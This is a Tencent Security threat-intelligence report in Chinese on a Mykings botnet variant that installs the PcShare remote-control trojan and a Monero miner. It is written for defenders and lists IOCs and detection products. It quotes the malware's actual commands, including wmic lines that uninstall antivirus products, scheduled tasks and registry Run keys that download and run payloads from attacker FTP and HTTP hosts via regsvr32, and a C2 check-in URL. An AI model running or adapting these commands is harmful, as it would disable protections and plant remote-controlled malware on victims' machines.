Mykings殭屍網絡新變種通過PcShare遠程控制,已感染超5萬臺電腦挖礦

長按二維碼關注

騰訊安全威脅情報中心

騰訊安全威脅情報中心檢測到Mykings挖礦殭屍網絡變種木馬，更新後的Mykings會在被感染系統安裝開源遠程控制木馬PcShare，對受害電腦進行遠程控制：可進行操作文件、服務、註冊表、進程、窗口等多種資源，並且可以下載和執行指定的程序。

Mykings殭屍網絡木馬還會關閉Windows Defender、檢測卸載常見殺毒軟體；卸載競品挖礦木馬和舊版挖礦木馬；下載「暗雲」木馬感染硬碟主引導記錄（MBR)實現長期駐留；通過計劃任務、添加啟動項等實現開機自動運行等行為。

MyKings殭屍網絡最早於2017年2月左右開始出現，該殭屍網絡通過掃描網際網路上 1433 及其他多個埠滲透進入受害者主機，然後傳播包括DDoS、Proxy（代理服務）、RAT（遠程控制木馬）、Miner（挖礦木馬）、暗雲III在內的多種不同用途的惡意代碼。由於MyKings殭屍網絡主動擴散的能力較強，影響範圍較廣，對企業用戶危害嚴重。根據門羅幣錢包算力1000KH/s進行推測，Mykings殭屍網絡目前已控制超過5萬臺電腦進行挖礦作業。

騰訊安全系列產品已支持檢測、清除Mykings殭屍網絡的最新變種，具體響應清單如下：

應用

場景

安全產品

解決方案

威

脅

情

報

騰訊T-Sec

威脅情報雲查服務

（SaaS）

1）Mykings殭屍網絡相關IOCs已入庫。

各類安全產品可通過「威脅情報雲查服務」提供的接口提升威脅識別能力。可參考:https://cloud.tencent.com/product/tics

騰訊T-Sec

高級威脅追溯系統

Mykings殭屍網絡相關信息和情報已支持檢索。

網管可通過威脅追溯系統，分析日誌，進行線索研判、追溯網絡入侵源頭。T-Sec高級威脅追溯系統的更多信息，可參考：https://cloud.tencent.com/product/atts

雲原生安全

防護

雲防火牆

（Cloud Firewall，CFW）

基於網絡流量進行威脅檢測與主動攔截，已支持：

1）Mykings殭屍網絡關聯的IOCs已支持識別檢測；

2）通過協議特徵檢測主機挖礦行為；

3）SQL Server弱口令爆破登陸行為檢測；

 

有關雲防火牆的更多信息，可參考：
 https://cloud.tencent.com/product/cfw

騰訊T-Sec  主機安全

（Cloud Workload Protection，CWP）

1）已支持查殺Mykings殭屍網絡相關木馬程序；

2）雲主機SQL Server弱口令風險項檢測；

 

騰訊主機安全（雲鏡）提供雲上終端的防毒殺毒、防入侵、漏洞管理、基線管理等。關於T-Sec主機安全的更多信息，可參考：https://cloud.tencent.com/product/cwp

騰訊T-Sec 安全運營中心

基於客戶雲端安全數據和騰訊安全大數據的雲安全運營平臺。已接入騰訊主機安全（雲鏡）、騰訊御知等產品數據導入，為客戶提供漏洞情報、威脅發現、事件處置、基線合規、及洩漏監測、風險可視等能力。

關於騰訊T-Sec安全運營中心的更多信息，可參考：https://s.tencent.com/product/soc/index.html

非雲企業安全防護

騰訊T-Sec

高級威脅檢測系統

（騰訊御界）

1）已支持通過協議檢測Mykings殭屍網絡與伺服器的網絡通信；

2）通過協議特徵檢測主機挖礦行為；

 

關於T-Sec高級威脅檢測系統的更多信息，可參考：

https://cloud.tencent.com/product/nta

騰訊T-Sec終端安全管理系統（御點）

1）可查殺Mykings殭屍網絡入侵釋放的木馬程序；

 

騰訊御點提供企業終端的防毒殺毒、防入侵、漏洞管理、基線管理等能力，關於T-Sec終端安全管理系統的更多資料，可參考：https://s.tencent.com/product/yd/index.html

mykings通過mssql爆破（1433埠）攻擊windows伺服器，爆破登陸成功後執行Powershell腳本power.txt。Power.txt首先關閉Windows Defender相關功能，然後下載kill.txt清除舊版挖礦程序。

Kill.txt根據進程名匹配舊版挖礦程序，其中標記為「1」代表清除對應的WMI啟動項，列表中Mykings常用進程名包括：
uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe

刪除舊版WMI事件過濾器「fuckyoumm2_filter」、消費者「fuckyoumm2_consumer」，從而刪除WMI啟動項。

Power.txt接著下載uninstall.txt執行，完成卸載殺軟、刪除舊版挖礦木馬、以及通過安裝Windows計劃任務、RUN啟動項、WMI啟動項進行本地持久化操作。

wmic.exe product where "name like '%Eset%'" call uninstall /nointeractivewmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractivewmic.exe product where "name like '%avast%'" call uninstall /nointeractivewmic.exe product where "name like '%avp%'" call uninstall /nointeractivewmic.exe product where "name like '%Security%'" call uninstall /nointeractivewmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractivewmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractivecmd /c "C:\Progra1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
安裝計劃任務「oka」啟動新版挖礦木馬lsma12.exe，殺死進程java.exe；
schtasks /create /tn "oka" /tr "cmd /c start c:\windows\inf\aspnet\lsma12.exe -p" /ru "system" /sc onstart /Fwmic.exe process where ExecutablePath='c:\\windows\\java\\java.exe' call Terminate
安裝計劃任務"Mysa"、"Mysa2"，在每次系統啟動時執行命令，使用帳號test密碼1433登陸FTP伺服器ftp[.]ftp0930[.]host下載木馬a1.exe和s1.rar並執行；
schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp0930.host >secho test>>secho 1433>>secho binary>>secho get a1.exe c:\windows\update.exe>>secho bye>>sftp -s:sc:\windows\update.exe" /ru "system" /sc onstart /Fschtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp0930.host>psecho test>>psecho 1433>>psecho get s1.rar c:\windows\help\lsmosee.exe>>psecho bye>>psftp -s:psc:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F
設置拒絕「system」用戶訪問指定文件和路徑；
cacls c:\windows\java\java.exe /e /d systemcacls c:\windows\temp\servtestdos.dll /e /d systemcacls C:\WINDOWS\Fonts\cd /e /d system
安裝RUN啟動項「start」負責下載執行腳本v1.sct，同時刪除舊啟動項「start1」，刪除舊計劃任務「Mysa3」、「ok」、「Mysa1」、「my1」。
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll" /freg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll" /freg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /fSCHTASKS /Delete /TN "Mysa3" /FSCHTASKS /Delete /TN "ok" /FSCHTASKS /Delete /TN "Mysa1" /FSCHTASKS /Delete /TN "my1" /F
繼續刪除舊版的名稱為「coronav」（新冠）的WMI啟動項，同時安裝新版的「coronav」WMI啟動項，在其中通過Powershell下載和執行以下腳本：
http[:]//ruisgood.ru/power.txt
http[:]//gamesoxalic.com/power.txt

或者通過regsvr32下載和執行腳本：
http[:]//ruisgood.ru/s.txt
http[:]//gamesoxalic.com/s.txt
安裝WMI啟動項「fuckamm3」、「fuckamm4」啟動新版挖礦木馬程序：
下載門羅幣挖礦程序、Mykings更新程序及暗雲木馬
Download.txt負責下載門羅幣挖礦程序、Mykings更新程序和安裝「暗雲」木馬感染程序：
Download.txt下載的ups.dat為自解壓程序，解壓後釋放多個文件到temp目錄下，執行競品挖礦木馬清除、挖礦木馬下載和啟動，以及安裝啟動項等更新操作。釋放的文件包括：
c:\windows\temp\ntuser.dat
c:\windows\temp\upx.exe
%temp%\c3.bat
%temp%\excludes
%temp%\n.vbs
 
Download.txt 下載的「暗雲」木馬max.rar會感染MBR執行shellcode，從雲端獲取Payload並最終獲取Mykings相關木馬文件。下載Payload網絡流量如下：
首先從C2伺服器http[:]//95.214.9.95/pld/cmd.txt下載cmd.txt。
然後向伺服器（http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***）發送上線信息，參數包括設備標識號uid和info，其中info包括計算機名、出口IP、CPU型號、CPU數量、內存大小信息，info數據經過base64編碼，伺服器接收數據後返回「AcceptOK」。
返回數據cmd.txt中指定下載的20200809.rar為PcShare開源遠控木馬，該木馬在github上有多個版本https[:]//github.com/LiveMirror/pcshare。木馬下載後被拷貝至：
c:\windows\debug\item.dat，啟動命令為：
rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
 
PcShare可根據服務端指令執行以下多種遠控功能，該木馬原始碼在多個共享平臺可供下載，黑客可以隨意下載和重新修改編譯。
枚舉、創建、重命名、刪除文件和目錄
枚舉和終止進程
編輯註冊表項和值
枚舉和修改服務
枚舉和控制窗口
執行二進位文件
從C＆C或提供的URL下載其他文件
將文件上傳到C＆C
執行shell命令
顯示消息框
重新啟動或關閉系統
 
PcShare連接C2伺服器：192.187.111.66:5566。
Download.txt從地址http[:]//ruisgood.ru/1201.rar下載得到XMRig挖礦程序，從地址http[:]//ruisgood.ru/config2.json下載得到挖礦配置文件，然後啟動挖礦進程：
c:\windows\inf\aspnet\lsma12.exe

挖礦時使用礦池：xmr-eu1.nanopool.org:14444
門羅幣錢包：
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka
查詢該錢包，已挖礦獲得143個XMR，折合人民幣8萬餘元。而其礦池算力平均為1000Kh/s（盈利100美元/天），可推算約5萬臺電腦被控制挖礦。

IOCs
C&C
192.187.111.66:5566
95.214.9.95

Domain
ruisgood.ru
ftp.ftp0801.ru
gamesoxalic.com
ftp.ftp0930.host
js.down0116.info
js.mys2016.info
wmi.1217bye.host
js.5b6b7b.ru
up.mykings.pw
kriso.ru
f321y.com
down.f4321y.com

IP
199.168.100.74
173.247.239.186
174.128.235.243
223.25.247.152
167.88.180.175
139.5.177.10
173.247.239.186
185.239.227.82

URL
http[:]//ruisgood.ru/ups.dat
http[:]//ruisgood.ru/power.txt
http[:]//ruisgood.ru/1201.rar
http[:]//ruisgood.ru/uninstall.txt
http[:]//ruisgood.ru/max.rar
http[:]//ruisgood.ru/config2.json
http[:]//ruisgood.ru/s.txt
http[:]//ruisgood.ru/upx.exe
http[:]//ruisgood.ru/s.xsl
http[:]//ruisgood.ru/download2.txt
http[:]//ruisgood.ru/batpower.txt
http[:]//ruisgood.ru/ups.dat
http[:]//ruisgood.ru/download.txt
http[:]//ruisgood.ru/kill.txt
http[:]//ruisgood.ru/up.txt
http[:]//ruisgood.ru/wmi.txt
http[:]//ruisgood.ru/batpower.tx
http[:]//ruisgood.ru/up2.txt
http[:]//gamesoxalic.com/power.txt
http[:]//gamesoxalic.com/s.txt
ftp[:]//199.168.100.74/aa.exe
ftp[:]//199.168.100.74/1.dat
ftp[:]//ftp.ftp0801.ru/1.dat
ftp[:]//ftp.ftp0801.ru/aa.exe
ftp[:]//ftp.ftp0930.host/a1.exe
ftp[:]//ftp.ftp0930.host/s1.rar
http[:]//js.down0116.info:280/v1.sct
http[:]//174.128.235.243/wmi.txt
http[:]//174.128.235.243/upsupx2.exe
http[:]//174.128.235.243/u.exe
http[:]//199.168.100.74/20200809.rar
http[:]//199.168.100.74:8074/1201.rar
http[:]//173.247.239.186:9999/max.exe
http[:]//173.247.239.186:9999/u.exe
http[:]//185.239.227.82:8082/2.exe
http[:]//wmi.1217bye.host/S.ps1
http[:]//95.214.9.95/pld/cmd.txt
http[:]//223.25.247.152:8152/batpower.txt
http[:]//167.88.180.175:8175/kill.txt
http[:]//167.88.180.175:8175/uninstall.txt
http[:]//139.5.177.10:280/psa.jpg
http[:]//199.168.100.74/2.exe
http[:]//199.168.100.74:8074/2.exe
http[:]//173.247.239.186/2.exe
http[:]//185.239.227.82:8082/2.exe
http[:]//173.247.239.186:9999/2.exe
http[:]//js.5b6b7b.ru/v.sct
http[:]//js.5b6b7b.ru:280/v.sct
http[:]//up.mykings.pw/update.txt
http[:]//kriso.ru/java12.dat
http[:]//js.ftp0930.host/helloworld.msi
http[:]//f321y.com:8888/dhelper.dat
http[:]//down.f4321y.com:8888/kill.html
MD5
20200809.rar
dce4ac18798ea897cdc9e09e06b178be
max.rar
bc7fc83ce9762eb97dc28ed1b79a0a10
u.exe
d9c32681d65c18d9955f5db42154a0f3
ups.dat
d1f978c88023639d6325805eb562de8c
upsupx2.exe
b5cd8af63e35db23eb1c6a4eb8244c45
address.txt
83bdb3a6fb995788de262b22919524f1
cloud.txt
6b9b70f4e0c8885d12169045e906d698
cmd.txt
6def7a0c5707f24a912c79f6520ca86f
kill.txt
1573ab993edc98decc09423fd82ec5ed
micro
f0129d85b17ee4d29ef52c63e0e548a4
power.txt
5670f0839333e4b160be05177601b40c
uninstall.txt
6092899216610fea5c65e416b34c1777
update.txt
581a86fea2afeb9b9d6d04c9a8f0a5c1
wmi.txt
6afc95f60630a588a7826608c70a60c8
wpd.jpg
bbae338b0cac5a2d169b8c535f33bfa0
batpower.txt
40160c782c2a41eed8d8eaf0c706050a
up.txt
6c190a44db2118d9c07037d769e0a62d
ups.txt
f41a8a69361fccc13344493c04a4f0d8
s.ps1
966abd05b7ad1b0b89d2a846f8a5a8f2
testav.dat
d4f7a3f44ae3f21863b1440219388a5b
psa.jpg
9cb1c1a78ce3efe57eef5f128b43710a

門羅幣錢包：
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka
參考連結：
https://www.freebuf.com/articles/193260.html
https://www.freebuf.com/articles/network/161286.html
https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware